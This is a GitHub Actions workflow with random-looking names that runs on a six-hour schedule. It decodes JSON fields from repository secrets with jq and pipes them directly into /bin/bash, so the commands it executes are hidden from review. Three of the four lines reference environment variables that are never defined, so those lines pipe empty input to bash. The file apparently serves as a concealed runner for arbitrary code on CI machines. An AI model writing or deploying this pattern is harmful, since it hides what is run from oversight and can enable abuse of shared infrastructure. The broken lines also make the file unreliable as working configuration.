name: gujulong3734

on:
  workflow_dispatch:
  schedule:
    - cron: '49 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gujulong3734
        env:
          kc032: ${{ secrets.kc032 }}
        run: |
          echo $kc032 | jq -r .tnf6 | /bin/bash
          echo $nv7 | jq -r .khjj68 | /bin/bash
          echo $s27 | jq -r .sawza660 | /bin/bash
          echo $af02 | jq -r .ejmfl9418 | /bin/bash

